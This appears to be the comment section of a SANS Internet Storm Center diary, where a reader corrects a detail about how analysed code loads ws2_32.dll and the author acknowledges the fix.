Handler On Duty
Chairman - SANS WhatWorks in Virtualization and Cloud Computing Security Summit

2 comment(s)


A slight correction: When the code is loading ws2_32.dll, ESP isn't pushed to take up space on the stack: it's pointing to the string parameter.
Fixed! Thank you for pointing that out, Chris.
